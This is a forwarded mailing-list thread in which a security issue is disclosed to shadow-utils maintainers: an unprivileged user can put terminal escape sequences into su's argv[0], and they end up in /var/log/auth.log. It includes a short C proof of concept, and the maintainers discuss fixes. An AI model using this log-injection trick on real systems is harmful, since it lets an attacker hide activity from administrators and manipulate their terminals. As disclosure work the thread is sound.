Hi, This seems to be a bug in util-linux, not shadow, so I've added util-linux@ to the thread. The discussion started in the email below, and was later continued in <https://github.com/shadow-maint/shadow/pull/960>. Have a lovely day! Alex On Sat, Mar 02, 2024 at 11:33:16AM -0600, Serge E. Hallyn wrote: > On Sat, Mar 02, 2024 at 11:34:07AM -0500, Skyler Ferrante (RIT Student) wrote: > > Hi Serge, > > > > I was playing around with some of the shadow-utils binaries and I > > realized that an unprivileged user can set argv[0] to contain escape > > sequences, and then cause it to be logged in /var/log/auth.log. > > > > PoC > > ``` > > #include<stdio.h> > > #include<unistd.h> > > int main(int argc, char** my_argv){ > > char* prog = "/usr/bin/su"; > > char* argv[] = {"\033[33mYellow", "root", NULL}; > > char* envp[] = {NULL}; > > > > execve(prog, argv, envp); > > printf("Failed to exec\n"); > > } > > ``` > > Run the binary, and type an incorrect password for root. Now run `tail > > /var/log/auth.log`. It should contain Yellow text. This can be used to > > hide log contents (move the cursor/delete characters). Some terminals > > also allow setting clipboard contents through escape sequences (my > > terminal, windows-terminal, supports this). > > > > It may be a good idea to refuse argv[0] if it contains binary data. > > You could also prevent this bug by not allowing an attacker to choose > > Prog (e.g. su could just use "su" as Prog). > > > > If you don't think this is a bad enough security issue to hide, I can > > post an issue on github. I would argue that you shouldn't cat auth.log > > or view it from tail, but I know a lot of people do. > > > > Cheers, > > Skyler > > Terminals can be a nuisance :) > > I don't think we need to hide this issue, but of course definitely address > it. I'm Cc:ing the other maintainers in case they feel differently. > > Did you want to send a PR to fix it? > > Thanks, > -serge -- <https://www.alejandro-colomar.es/> Looking for a remote C programming job at the moment.
Attachment:
signature.asc
Description: PGP signature
